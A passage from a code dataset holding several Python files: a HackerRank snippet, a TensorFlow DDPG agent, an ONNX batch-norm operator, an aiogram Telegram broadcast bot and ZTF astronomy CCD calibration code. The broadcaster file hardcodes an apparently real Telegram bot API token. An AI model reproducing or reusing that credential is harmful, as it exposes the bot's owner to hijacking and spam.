(i + ii))\n# Print the sum of the double variables on a new line.\nprint(\"%.1f\" % (d + dd))\n# Concatenate and print the String variables on a new line\n# The 's' variable above should be printed first.\nprint(s + ss)\n","sub_path":"hackerrank/30 days of coding/data_types.py","file_name":"data_types.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"381238","text":"# -*- coding: utf8 -*-\n\nimport multiprocessing\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nfrom yarll.agents.agent import Agent\nfrom yarll.memory.memory import Memory\nfrom yarll.misc.noise import OrnsteinUhlenbeckActionNoise\nfrom yarll.misc.network_ops import batch_norm_layer, fan_in_initializer, linear_fan_in\n\nclass DDPG(Agent):\n def __init__(self, env, monitor_path: str, **usercfg) -> None:\n super(DDPG, self).__init__(**usercfg)\n self.env = env\n self.monitor_path: str = monitor_path\n\n self.config.update(\n n_episodes=100000,\n n_timesteps=env.spec.tags.get(\"wrapper_config.TimeLimit.max_episode_steps\"),\n actor_learning_rate=1e-4,\n critic_learning_rate=1e-3,\n ou_theta=0.15,\n ou_sigma=0.2,\n gamma=0.99,\n batch_size=64,\n tau=0.001,\n l2_loss_coef=1e-2,\n n_actor_layers=2,\n n_hidden_units=64,\n actor_layer_norm=True,\n critic_layer_norm=False, # Batch norm for critic does not seem to work\n replay_buffer_size=1e6,\n replay_start_size=10000 # Required number of replay buffer entries to start training\n )\n self.config.update(usercfg)\n\n self.state_shape: list = list(env.observation_space.shape)\n self.n_actions: int = env.action_space.shape[0]\n self.states = tf.placeholder(tf.float32, [None] + self.state_shape, name=\"states\")\n self.actions_taken = tf.placeholder(tf.float32, [None, self.n_actions], name=\"actions_taken\")\n self.critic_target = tf.placeholder(tf.float32, [None, 1], name=\"critic_target\")\n self.is_training = tf.placeholder(tf.bool, 
name=\"is_training\")\n\n with tf.variable_scope(\"actor\"):\n self.action_output, self.actor_vars = self.build_actor_network()\n\n self.target_action_output, actor_target_update = self.build_target_actor_network(self.actor_vars)\n\n self.q_gradient_input = tf.placeholder(\"float\", [None, self.n_actions], name=\"q_grad_input\")\n self.actor_policy_gradients = tf.gradients(\n self.action_output, self.actor_vars, -self.q_gradient_input, name=\"actor_gradients\")\n self.actor_train_op = tf.train.AdamOptimizer(\n self.config[\"actor_learning_rate\"],\n name=\"actor_optimizer\").apply_gradients(list(zip(self.actor_policy_gradients, self.actor_vars)))\n\n with tf.variable_scope(\"critic\"):\n self.q_value_output, self.critic_vars = self.build_critic_network()\n\n self.target_q_value_output, critic_target_update = self.build_target_critic_network(self.critic_vars)\n\n l2_loss = tf.add_n([self.config[\"l2_loss_coef\"] * tf.nn.l2_loss(var) for var in self.critic_vars])\n self.critic_loss = tf.reduce_mean(tf.square(self.critic_target - self.q_value_output)) + l2_loss\n self.critic_train_op = tf.train.AdamOptimizer(\n self.config[\"critic_learning_rate\"],\n name=\"critic_optimizer\").minimize(self.critic_loss)\n self.action_gradients = tf.gradients(self.q_value_output, self.actions_taken, name=\"action_gradients\")\n\n summaries = []\n for v in self.actor_vars + self.critic_vars:\n summaries.append(tf.summary.histogram(v.name, v))\n self.model_summary_op = tf.summary.merge(summaries)\n\n self.update_targets_op = tf.group(actor_target_update, critic_target_update, name=\"update_targets\")\n\n\n self.action_noise = OrnsteinUhlenbeckActionNoise(\n self.n_actions,\n self.config[\"ou_sigma\"],\n self.config[\"ou_theta\"]\n )\n\n self.replay_buffer = Memory(int(self.config[\"replay_buffer_size\"]))\n\n num_cpu = multiprocessing.cpu_count()\n tf_config = tf.ConfigProto(\n allow_soft_placement=True,\n inter_op_parallelism_threads=num_cpu,\n intra_op_parallelism_threads=num_cpu)\n 
self.session = tf.Session(config=tf_config)\n self.init_op = tf.global_variables_initializer()\n\n self.n_updates = 0\n\n self.summary_writer = tf.summary.FileWriter(os.path.join(\n self.monitor_path, \"summaries\"), tf.get_default_graph())\n\n def _initalize(self):\n self.session.run(self.init_op)\n\n def build_actor_network(self):\n layer1_size = 400\n layer2_size = 300\n\n x = self.states\n if self.config[\"actor_layer_norm\"]:\n x = batch_norm_layer(x, training_phase=self.is_training, scope_bn=\"batch_norm_0\", activation=tf.identity)\n with tf.variable_scope(\"L1\"):\n x, l1_vars = linear_fan_in(x, layer1_size)\n if self.config[\"actor_layer_norm\"]:\n x = batch_norm_layer(x, training_phase=self.is_training, scope_bn=\"batch_norm_1\", activation=tf.nn.relu)\n with tf.variable_scope(\"L2\"):\n x, l2_vars = linear_fan_in(x, layer2_size)\n if self.config[\"actor_layer_norm\"]:\n x = batch_norm_layer(x, training_phase=self.is_training, scope_bn=\"batch_norm_2\", activation=tf.nn.relu)\n\n with tf.variable_scope(\"L3\"):\n W3 = tf.Variable(tf.random_uniform([layer2_size, self.n_actions], -3e-3, 3e-3), name=\"w\")\n b3 = tf.Variable(tf.random_uniform([self.n_actions], -3e-3, 3e-3), name=\"b\")\n action_output = tf.tanh(tf.nn.xw_plus_b(x, W3, b3))\n l3_vars = [W3, b3]\n\n return action_output, l1_vars + l2_vars + l3_vars\n\n def build_target_actor_network(self, actor_vars: list):\n ema = tf.train.ExponentialMovingAverage(decay=1 - self.config[\"tau\"])\n target_update = ema.apply(actor_vars)\n target_net = [ema.average(v) for v in actor_vars]\n\n x = self.states\n if self.config[\"actor_layer_norm\"]:\n x = batch_norm_layer(\n x, training_phase=self.is_training, scope_bn=\"target_batch_norm_0\", activation=tf.identity)\n\n x = tf.nn.xw_plus_b(x, target_net[0], target_net[1])\n if self.config[\"actor_layer_norm\"]:\n x = batch_norm_layer(\n x, training_phase=self.is_training, scope_bn=\"target_batch_norm_1\", activation=tf.nn.relu)\n x = tf.nn.xw_plus_b(x, 
target_net[2], target_net[3])\n if self.config[\"actor_layer_norm\"]:\n x = batch_norm_layer(\n x, training_phase=self.is_training, scope_bn=\"target_batch_norm_2\", activation=tf.nn.relu)\n\n action_output = tf.tanh(tf.nn.xw_plus_b(x, target_net[4], target_net[5]))\n\n return action_output, target_update\n\n def build_critic_network(self):\n layer1_size = 400\n layer2_size = 300\n\n x = self.states\n with tf.variable_scope(\"L1\"):\n if self.config[\"critic_layer_norm\"]: # Defaults to False (= don't use it)\n x = batch_norm_layer(x, training_phase=self.is_training,\n scope_bn=\"batch_norm_0\", activation=tf.identity)\n x, l1_vars = linear_fan_in(x, layer1_size)\n x = tf.nn.relu(x)\n with tf.variable_scope(\"L2\"):\n W2 = tf.get_variable(\n \"w\", [layer1_size, layer2_size], initializer=fan_in_initializer(layer1_size + self.n_actions))\n W2_action = tf.get_variable(\n \"w_action\", [self.n_actions, layer2_size], initializer=fan_in_initializer(layer1_size + self.n_actions))\n b2 = tf.get_variable(\n \"b\", [layer2_size], initializer=fan_in_initializer(layer1_size + self.n_actions))\n x = tf.nn.relu(tf.matmul(x, W2) + tf.matmul(self.actions_taken, W2_action) + b2)\n with tf.variable_scope(\"L3\"):\n W3 = tf.Variable(tf.random_uniform([layer2_size, 1], -3e-3, 3e-3), name=\"w\")\n b3 = tf.Variable(tf.random_uniform([1], -3e-3, 3e-3), name=\"b\")\n q_value_output = tf.nn.xw_plus_b(x, W3, b3, name=\"q_value\")\n\n return q_value_output, l1_vars + [W2, W2_action, b2, W3, b3]\n\n def build_target_critic_network(self, critic_vars: list):\n\n ema = tf.train.ExponentialMovingAverage(decay=1 - self.config[\"tau\"])\n target_update = ema.apply(critic_vars)\n target_net = [ema.average(v) for v in critic_vars]\n\n x = self.states\n if self.config[\"critic_layer_norm\"]:\n x = batch_norm_layer(x, training_phase=self.is_training, scope_bn=\"batch_norm_0\", activation=tf.identity)\n x = tf.nn.relu(tf.nn.xw_plus_b(x, target_net[0], target_net[1]))\n x = tf.nn.relu(tf.matmul(x, 
target_net[2]) + tf.matmul(self.actions_taken, target_net[3]) + target_net[4])\n q_value_output = tf.nn.xw_plus_b(x, target_net[5], target_net[6])\n\n return q_value_output, target_update\n\n def actor_gradients(self, state_batch: np.ndarray, action_batch: np.ndarray):\n q, grads = tf.get_default_session().run([self.q_value_output, self.action_gradients], feed_dict={\n self.states: state_batch,\n self.actions_taken: action_batch,\n self.is_training: False\n })\n summary = tf.Summary()\n summary.value.add(tag=\"model/actor_loss\", simple_value=float(-np.mean(q)))\n self.summary_writer.add_summary(summary, self.n_updates)\n return grads[0]\n\n def target_q(self, states: np.ndarray, actions: np.ndarray):\n return tf.get_default_session().run(self.target_q_value_output, feed_dict={\n self.states: states,\n self.actions_taken: actions,\n self.is_training: False\n })\n\n def q_value(self, states: np.ndarray, actions: np.ndarray):\n return tf.get_default_session().run(self.q_value_output, feed_dict={\n self.states: states,\n self.actions_taken: actions,\n self.is_training: False\n })\n\n def actions(self, states: np.ndarray) -> np.ndarray:\n \"\"\"Get the actions for a batch of states.\"\"\"\n return tf.get_default_session().run(self.action_output, feed_dict={\n self.states: states,\n self.is_training: True\n })\n\n def action(self, state: np.ndarray) -> np.ndarray:\n \"\"\"Get the action for a single state.\"\"\"\n return tf.get_default_session().run(self.action_output, feed_dict={\n self.states: [state],\n self.is_training: False\n })[0]\n\n def target_actions(self, states: np.ndarray) -> np.ndarray:\n \"\"\"Get the actions for a batch of states using the target actor network.\"\"\"\n return tf.get_default_session().run(self.target_action_output, feed_dict={\n self.states: states,\n self.is_training: True\n })\n\n def train(self):\n sample = self.replay_buffer.get_batch(int(self.config[\"batch_size\"]))\n\n # for n_actions = 1\n action_batch = 
np.resize(sample[\"actions\"], [int(self.config[\"batch_size\"]), self.n_actions])\n\n # Calculate critic targets\n next_action_batch = self.target_actions(sample[\"states1\"])\n q_value_batch = self.target_q(sample[\"states1\"], next_action_batch)\n critic_targets = sample[\"rewards\"] + (1 - sample[\"terminals1\"]) * \\\n self.config[\"gamma\"] * q_value_batch.squeeze()\n critic_targets = np.resize(critic_targets, [int(self.config[\"batch_size\"]), 1]).astype(np.float32)\n # Update actor weights\n fetches = [self.q_value_output, self.critic_loss, self.critic_train_op]\n predicted_q, critic_loss, _ = tf.get_default_session().run(fetches, feed_dict={\n self.critic_target: critic_targets,\n self.states: sample[\"states0\"],\n self.actions_taken: action_batch,\n self.is_training: True\n })\n\n summary = tf.Summary()\n summary.value.add(tag=\"model/critic_loss\", simple_value=float(critic_loss))\n summary.value.add(tag=\"model/predicted_q_mean\", simple_value=np.mean(predicted_q))\n summary.value.add(tag=\"model/predicted_q_std\", simple_value=np.std(predicted_q))\n self.summary_writer.add_summary(summary, self.n_updates)\n\n # Update the actor using the sampled gradient:\n action_batch_for_gradients = self.actions(sample[\"states0\"])\n q_gradient_batch = self.actor_gradients(sample[\"states0\"], action_batch_for_gradients)\n\n tf.get_default_session().run(self.actor_train_op, feed_dict={\n self.q_gradient_input: q_gradient_batch,\n self.states: sample[\"states0\"],\n self.is_training: True\n })\n\n # Update the target networks\n tf.get_default_session().run([self.update_targets_op, self.model_summary_op])\n self.n_updates += 1\n\n def noise_action(self, state: np.ndarray):\n \"\"\"Choose an action based on the actor and exploration noise.\"\"\"\n action = self.action(state)\n return action + self.action_noise()\n\n def learn(self):\n max_action = self.env.action_space.high\n self._initalize()\n with self.session as sess, sess.as_default():\n for episode in 
range(int(self.config[\"n_episodes\"])):\n state = self.env.reset()\n episode_reward = 0\n episode_length = 0\n for _ in range(int(self.config[\"n_timesteps\"])):\n action = self.noise_action(state)\n new_state, reward, done, _ = self.env.step(action * max_action)\n episode_length += 1\n episode_reward += reward\n self.replay_buffer.add(state, action, reward, new_state, done)\n if self.replay_buffer.n_entries > self.config[\"replay_start_size\"]:\n self.train()\n state = new_state\n if done:\n self.action_noise.reset()\n summary = tf.Summary()\n summary.value.add(tag=\"env/Episode_length\",\n simple_value=float(episode_length))\n summary.value.add(tag=\"env/Reward\",\n simple_value=float(episode_reward))\n self.summary_writer.add_summary(summary, episode)\n self.summary_writer.flush()\n break\n","sub_path":"yarll/agents/ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":14189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"606882930","text":"# -*- encoding: utf-8 -*-\n# pylint: disable=E0203,E1101,C0111\n\"\"\"\n@file\n@brief Runtime operator.\n\"\"\"\nimport numpy\nfrom ._op import OpRun\n\n\ndef _batchnorm_test_mode(x, s, bias, mean, var, epsilon=1e-5):\n dims_x = len(x.shape)\n dim_ones = (1,) * (dims_x - 2)\n s = s.reshape(-1, *dim_ones)\n bias = bias.reshape(-1, *dim_ones)\n mean = mean.reshape(-1, *dim_ones)\n var = var.reshape(-1, *dim_ones)\n return s * (x - mean) / numpy.sqrt(var + epsilon) + bias\n\n\nclass BatchNormalization(OpRun):\n\n atts = {'epsilon': 1e-5, 'momentum': 0.9}\n\n def __init__(self, onnx_node, desc=None, **options):\n OpRun.__init__(self, onnx_node, desc=desc,\n expected_attributes=BatchNormalization.atts,\n **options)\n\n def _run(self, x, scale, bias, mean, var): # pylint: disable=W0221\n res = _batchnorm_test_mode(\n x, scale, bias, mean, var, epsilon=self.epsilon)\n return (res, )\n\n def _infer_shapes(self, x, scale, bias, mean, var): # pylint: disable=W0221\n 
return (x, )\n","sub_path":"mlprodict/onnxrt/ops_cpu/op_batch_normalization.py","file_name":"op_batch_normalization.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"359237166","text":"import asyncio\nimport ujson\nimport logging\nfrom string import Template\n\nimport templates\n\nfrom aiogram import Bot, Dispatcher, types\nfrom aiogram.utils import exceptions, executor\n\nfrom utils import get_rent_type\n\nAPI_TOKEN = \"805817039:AAGeuzqxxJ0HjEL43f8TBtMmjl1Yo4oECRo\"\n\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger(\"broadcast\")\n\nbot = Bot(token=API_TOKEN, parse_mode=types.ParseMode.HTML)\ndp = Dispatcher(bot)\n\n\ndef get_users():\n users = []\n with open(\"users\", \"r\") as f:\n users = f.readlines()\n yield from set(users)\n\n\nasync def send_message(user_id: int, text: str, disable_notification: bool = False) -> bool:\n \"\"\"\n Safe messages sender\n\n :param user_id:\n :param text:\n :param disable_notification:\n :return:\n \"\"\"\n try:\n await bot.send_message(user_id, text, disable_notification=disable_notification)\n except exceptions.BotBlocked:\n log.error(f\"Target [ID:{user_id}]: blocked by user\")\n except exceptions.ChatNotFound:\n log.error(f\"Target [ID:{user_id}]: invalid user ID\")\n except exceptions.RetryAfter as e:\n log.error(f\"Target [ID:{user_id}]: Flood limit is exceeded. 
Sleep {e.timeout} seconds.\")\n await asyncio.sleep(e.timeout)\n return await send_message(user_id, text) # Recursive call\n except exceptions.UserDeactivated:\n log.error(f\"Target [ID:{user_id}]: user is deactivated\")\n except exceptions.TelegramAPIError:\n log.exception(f\"Target [ID:{user_id}]: failed\")\n else:\n log.info(f\"Target [ID:{user_id}]: success\")\n return True\n return False\n\n\nasync def broadcaster() -> int:\n count = 0\n try:\n for user_id in get_users():\n with open(\"need_broadcast\", \"r\") as f:\n for raw_apartment in f:\n apartment = ujson.loads(raw_apartment)\n apartment_message = Template(templates.single_apartment).safe_substitute(\n rooms_count=get_rent_type(apartment[\"rent_type\"]),\n price_usd=apartment[\"price\"][\"converted\"][\"USD\"][\"amount\"],\n address=apartment[\"location\"][\"address\"] or apartment[\"location\"][\"user_address\"],\n photo=apartment[\"photo\"],\n )\n if await send_message(user_id, apartment_message):\n count += 1\n await asyncio.sleep(0.05) # 20 messages per second (Limit: 30 messages per second)\n finally:\n log.info(f\"{count} messages successful sent.\")\n\n return count\n\n\nif __name__ == \"__main__\":\n # Execute broadcaster\n executor.start(dp, broadcaster())\n","sub_path":"broadcaster.py","file_name":"broadcaster.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"331398057","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import optimize\nfrom astropy.io import fits\nfrom astropy.time import Time\nimport pandas\nimport os\nfrom ztfquery import query\n\n# Class to get CCD image\nclass ccdimage:\n\n def __init__(self, imgfile): \n self.imgfile = imgfile\n \n def polynom2(self, x, a0, a1, a2):\n # 2nd order polynomial function to fit overscan\n return a0 + a1*x + a2*x**2\n \n def overscan_correction(self, quadrant, overscan):\n # Fit x-overscan pixels (y-stacked in [4:27]) with 
2nd-order polynomial function \n over_profil = np.median(overscan[:,4:27], axis=1)\n xpixel = np.arange(3080)\n over_median = np.median(over_profil)\n df_overscan = pandas.DataFrame({'xpix': xpixel, 'yval': over_profil})\n over_cut = 2*over_median\n flag = df_overscan[\"yval\"] Missing file:\", img_file)\n return q\n \n def linearity_correction(self, cID, aID, quad_in):\n # Extract linearity coefficients\n ccdID = int(cID)\n ampID = int(aID)-1\n coeff_file = \"CCD_amp_coeff_v2.txt\"\n coeff = pandas.read_csv(coeff_file, comment='#', header=None, sep='\\s+', usecols=[0, 1, 2, 3, 4]) \n coeff.columns = ['CCDID', 'AMP_NAME', 'AMP_ID', 'A', 'B']\n flag_ccdID = coeff['CCDID']==ccdID\n coeff = coeff[flag_ccdID]\n flag_ampID = coeff['AMP_ID']==ampID\n coeff = coeff[flag_ampID]\n A = float(coeff.loc[coeff.index[0],'A'])\n B = float(coeff.loc[coeff.index[0],'B'])\n # Perform quadratic correction on pixel counting\n quad_out = quad_in / (A*quad_in*quad_in + B*quad_in + 1)\n return quad_out\n\n def get_ccd_raw(self, img_file=None, overscan_corr=True, linearity_corr=True):\n # Merging of the 4 quadrants (00, 01, 02, 03) of a CCD from raw data\n # in a single image with the quadrant sub-structure\n # q2 q1\n # q3 q4\n # Read CCD quadrants\n if (img_file is None):\n img_file = self.imgfile\n q1 = self.read_quadrant(img_file, 1)\n q2 = self.read_quadrant(img_file, 2)\n q3 = self.read_quadrant(img_file, 3)\n q4 = self.read_quadrant(img_file, 4)\n # Read CCD overscans\n if (overscan_corr):\n o1 = self.read_quadrant(img_file, 5)\n o2 = self.read_quadrant(img_file, 6)\n o3 = self.read_quadrant(img_file, 7)\n o4 = self.read_quadrant(img_file, 8)\n # Overscan correction with 2nd-order polynomial fit of overscan\n q1 = self.overscan_correction(q1, o1)\n q2 = self.overscan_correction(q2, o2)\n q3 = self.overscan_correction(q3, o3)\n q4 = self.overscan_correction(q4, o4) \n # Per-quadrant linearity correction on pixel counting based on a quadratic model fit to laboratory data \n if 
(linearity_corr):\n cID = self.get_ccd_id()\n q1 = self.linearity_correction(cID, '1', q1)\n q2 = self.linearity_correction(cID, '2', q2)\n q3 = self.linearity_correction(cID, '3', q3)\n q4 = self.linearity_correction(cID, '4', q4)\n # Each quadrant is rotated by 180° before merging\n q1 = np.rot90(q1, 2)\n q2 = np.rot90(q2, 2)\n q3 = np.rot90(q3, 2)\n q4 = np.rot90(q4, 2)\n # Horizontal merging of CCD quadrants 00 and 01 \n ccd_up = np.concatenate((q2, q1), axis=1) \n # Horizontal merging of CCD quadrants 02 and 03\n ccd_down = np.concatenate((q3, q4), axis=1) \n # Vertical merging of the two above half-CCD \n ccd = np.concatenate((ccd_down, ccd_up), axis=0) \n return ccd\n \n def image_ploting(self, image, Imin=0, Imax=0):\n # Plot image\n if (Imin==0 and Imax==0):\n m0 = np.median(image)\n s0 = np.std(image)\n Imin = m0 - s0\n Imax = m0 + s0\n if (s0 > m0):\n Imin = 0\n Imax = 2*m0\n fig = plt.figure(figsize=(10, 8))\n fig.add_subplot(111)\n plt.imshow(image, interpolation='nearest', origin='lower', cmap='gray', vmin=Imin, vmax=Imax)\n plt.colorbar()\n #fig.savefig(dirname+filename+\".png\", dpi=150, bbox_inches='tight')\n return\n\n def image_saving(self, filename, image):\n # Save image as fit file\n os.system(\"rm \"+filename)\n hdu = fits.PrimaryHDU()\n hdu.writeto(filename)#, clobber=True)\n fits.append(filename, image, overwrite=True)\n #os.system(\"fpack \"+filename)\n #os.system(\"rm \"+filename) \n return\n\n def get_ccd_id(self):\n # Extract CCD ID from imgage file name\n idx = self.imgfile.index('.fits') - 4\n return self.imgfile[idx:idx+2]\n\n def get_filter_id(self):\n # Extract CCD ID from imgage file name\n idx = self.imgfile.index('.fits') - 8\n return self.imgfile[idx:idx+2]\n\n def get_date(self):\n # Extract date from imgage file name\n idx = self.imgfile.index('/ZTF/raw/') + len('/ZTF/raw/')\n return self.imgfile[idx:idx+4] + self.imgfile[idx+5:idx+9]\n\n def get_dirname(self):\n # Extrtact general data directory from image file name\n idx = 
self.imgfile.index('ztf_') - 21\n return self.imgfile[0:idx]\n\n def get_imgname(self):\n # Extrtact image file name from full link\n idx = self.imgfile.index('ztf_')\n return self.imgfile[idx:len(self.imgfile)]\n\n def get_ccd_cal(self):\n # Get CCD bias image computed \n if (os.path.isfile(self.imgfile)):\n return fits.getdata(self.imgfile, 0)\n else:\n raise ValueError(\"-> Missing file:\", self.imgfile)\n\n def get_ccd_bias(self):\n # Get CCD ID\n cid = self.get_ccd_id()\n cnum = int(cid)\n # Get Date\n date = self.get_date()\n # Local query\n zquery = query.ZTFQuery()\n zquery.load_metadata(kind=\"cal\", caltype=\"bias\", sql_query=\"nightdate=\"+str(date)+\" AND ccdid=\"+str(cnum))\n list_bias = zquery.get_data_path(source=\"local\")\n if (len(list_bias)!=4):\n raise ValueError(\"Wrong number of bias files for this CCD image:\", self.imgfile)\n list_bias.sort()\n # Read CCD quadrants \n q1 = self.read_quadrant(list_bias[0], 0)\n q2 = self.read_quadrant(list_bias[1], 0)\n q3 = self.read_quadrant(list_bias[2], 0)\n q4 = self.read_quadrant(list_bias[3], 0)\n # Each quadrant is rotated by 180° before merging\n q1 = np.rot90(q1, 2)\n q2 = np.rot90(q2, 2)\n q3 = np.rot90(q3, 2)\n q4 = np.rot90(q4, 2)\n # Horizontal merging of CCD quadrants 00 and 01 \n ccd_up = np.concatenate((q2, q1), axis=1) \n # Horizontal merging of CCD quadrants 02 and 03\n ccd_down = np.concatenate((q3, q4), axis=1) \n # Vertical merging of the two above half-CCD \n ccd = np.concatenate((ccd_down, ccd_up), axis=0) \n return ccd\n\n def get_flat_name(self):\n # Get Date\n date = self.get_date()\n dirdate = date[0:4]+'/'+date[4:8]+'/'\n # Get directory\n dirname = self.get_dirname()+'cal/'+dirdate+'ccdflat/'\n # Get filter ID\n fid = self.get_filter_id()\n # Get CCD ID\n cid = self.get_ccd_id()\n # Define CCD flat name\n flatname = dirname+'ztf_'+date+'_000000_'+fid+'_c'+cid+'_f.fits'\n return flatname\n\n def get_ccd_flat(self):\n # Check that flat exist otherwise compute and write it\n 
flatname = self.get_flat_name()\n if (os.path.isfile(flatname)==False):\n # Check that directory destination exist otherwise create it\n self.set_flat_directory(flatname)\n # Compute flat and write it in dirname\n self.compute_ccd_flat(flatname)\n if (os.path.isfile(flatname)):\n return fits.getdata(flatname, 0)\n else:\n raise ValueError(\"-> Missing CCD flat file:\", imgfile)\n return ccd\n\n def set_flat_directory(self, flatname):\n # Get directory name\n idx = flatname.index('ztf_')\n dirname = flatname[0:idx]\n # Check if directory desdtination exists, otherwise create it\n if (os.path.isdir(dirname)):\n return\n else:\n os.system(\"mkdir \"+dirname)\n return\n\n def compute_ccd_flat(self, flatname):\n date = self.get_date()\n date_bis = '/'+date[0:4]+'/'+date[4:8]+'/'\n print(\"|-> Compute CCD flat-field for date\", date_bis)\n # Get list of raw flat fields\n list_flat = self.get_flat_list()\n # Check that list of raw flat fields is OK\n if (len(list_flat)==0):\n raise ValueError(\"No flat for image\", self.imgfile)\n n = len(list_flat)\n fid = self.get_filter_id()\n if ((fid=='zg' or fid=='zr') and n!=20):\n raise ValueError(\"Wrong number of flat files for image\", self.imgfile)\n if (fid=='zi' and n!=21):\n raise ValueError(\"Wrong number of flat files for image\", self.imgfile)\n # Get bias for the whole CCD\n ccd_bias = self.get_ccd_bias()\n # Stack flat fields after bias correction\n for i in range(n):\n if (i==0):\n ccd = self.get_ccd_raw(img_file=list_flat[i]) - ccd_bias\n else:\n ccd += self.get_ccd_raw(img_file=list_flat[i]) - ccd_bias\n # Normalized flat field to median\n ccd /= np.median(ccd)\n # Write flat field\n self.image_saving(flatname, ccd)\n return True\n\n def get_flat_list(self):\n # Get CCD ID\n cid = self.get_ccd_id()\n cnum = int(cid)\n # Get filter ID\n fid = self.get_filter_id()\n if (fid=='zg'):\n fnum = 1\n elif (fid=='zr'):\n fnum = 2\n elif (fid=='zi'):\n fnum = 3\n else:\n fnum = 0\n # Get date\n idx = 
self.imgfile.index('/ZTF/raw/') + len('/ZTF/raw/')\n year = self.imgfile[idx:idx+4] \n month = self.imgfile[idx+5:idx+7]\n day = self.imgfile[idx+7:idx+9]\n dates = [year+'-'+month+'-'+day+'T00:00:00', year+'-'+month+'-'+day+'T23:59:59']\n t = Time(dates, format='isot', scale='utc')\n dates_jd = t.jd \n # Local query\n zquery = query.ZTFQuery()\n zquery.load_metadata(kind=\"raw\", sql_query=\"imgtypecode='f' AND fid=\"+str(fnum)+\" AND ccdid=\"+str(cnum)+\" AND obsjd BETWEEN \"+str(dates_jd[0])+\" AND \"+str(dates_jd[1]))\n return zquery.get_data_path(source=\"local\")\n\n def compute_ccd_sci(self):\n img = self.get_imgname()\n print(\"|-> Compute CCD science image with global CCD flat-field corresponding to\", img)\n # Get CCD raw-overscan corrected image \n ccd_raw = self.get_ccd_raw()\n # Get CCD bias image\n ccd_bias = self.get_ccd_bias()\n # Get CCD flat image \n ccd_flat = self.get_ccd_flat() \n # Compute CCD science image\n ccd_corr = ccd_raw - ccd_bias\n ccd_sci = ccd_corr / ccd_flat\n # Divide CCD image in quadrant images\n quad = self.ccd_to_quadrant(ccd_sci)\n # Write each new science quadrant image with ZTF HDU\n self.write_quad(quad)\n return ccd_sci\n\n def get_my_sci_list(self):\n ztfsci_list = self.get_sci_list()\n # Generate my science image file names from ZTF science image file names \n mysci_list = []\n for i in range(len(ztfsci_list)):\n img_file = ztfsci_list[i]\n idx = img_file.index('.fits')\n mysci_list.append(img_file[0:idx]+'_in2p3.fits')\n return mysci_list\n\n def get_ztf_ccd_sci(self):\n # Get CCD science image computed by ZTF pipeline\n #print('--> Get ZTF CCD science image for on-sky image', self.imgfile)\n imglist = self.get_sci_list()\n return self.get_ccd_sci(imglist)\n\n def get_my_ccd_sci(self):\n # Get CCD science image computed with the global CCD flat-field\n #print('--> Get my CCD science image for on-sky image', self.imgfile)\n mysci_list = self.get_my_sci_list()\n # Check if my CCD science image exist otherwise create it\n 
if (os.path.isfile(mysci_list[0]) and os.path.isfile(mysci_list[1]) and os.path.isfile(mysci_list[2]) and os.path.isfile(mysci_list[3])):\n ccd_sci = self.get_ccd_sci(mysci_list)\n else:\n # Compute my CCD science images and write it \n ccd_sci = self.compute_ccd_sci()\n return ccd_sci\n\n def get_ccd_sci(self, imglist):\n # Merging of the 4 quadrants (00, 01, 02, 03) of a CCD from raw data\n # in a single image with the quadrant sub-structure\n # q2 q1\n # q3 q4\n # Read CCD quadrants \n q1 = self.read_quadrant(imglist[0], 0)\n q2 = self.read_quadrant(imglist[1], 0)\n q3 = self.read_quadrant(imglist[2], 0)\n q4 = self.read_quadrant(imglist[3], 0)\n # Each quadrant is rotated by 180° before merging\n q1 = np.rot90(q1, 2)\n q2 = np.rot90(q2, 2)\n q3 = np.rot90(q3, 2)\n q4 = np.rot90(q4, 2)\n # Horizontal merging of CCD quadrants 00 and 01 \n ccd_up = np.concatenate((q2, q1), axis=1) \n # Horizontal merging of CCD quadrants 02 and 03\n ccd_down = np.concatenate((q3, q4), axis=1) \n # Vertical merging of the two above half-CCD \n ccd = np.concatenate((ccd_down, ccd_up), axis=0) \n return ccd\n\n def get_sci_list(self):\n # Get CCD ID\n cid = self.get_ccd_id()\n cnum = int(cid)\n # Get filter ID\n fid = self.get_filter_id()\n if (fid=='zg'):\n fnum = 1\n elif (fid=='zr'):\n fnum = 2\n elif (fid=='zi'):\n fnum = 3\n else:\n fnum = 0\n # Get field\n idx = self.imgfile.index(fid) - 7\n field = int(self.imgfile[idx:idx+6])\n # Get date\n idx = self.imgfile.index('/ZTF/raw/') + len('/ZTF/raw/')\n year = self.imgfile[idx:idx+4] \n month = self.imgfile[idx+5:idx+7]\n day = self.imgfile[idx+7:idx+9]\n dates = [year+'-'+month+'-'+day+'T00:00:00', year+'-'+month+'-'+day+'T23:59:59']\n t = Time(dates, format='isot', scale='utc')\n dates_jd = t.jd \n # Local query\n zquery = query.ZTFQuery()\n zquery.load_metadata(kind=\"sci\", sql_query=\"fid=\"+str(fnum)+\" AND ccdid=\"+str(cnum)+ \"AND field=\"+str(field)+\" AND obsjd BETWEEN \"+str(dates_jd[0])+\" AND \"+str(dates_jd[1]))\n 
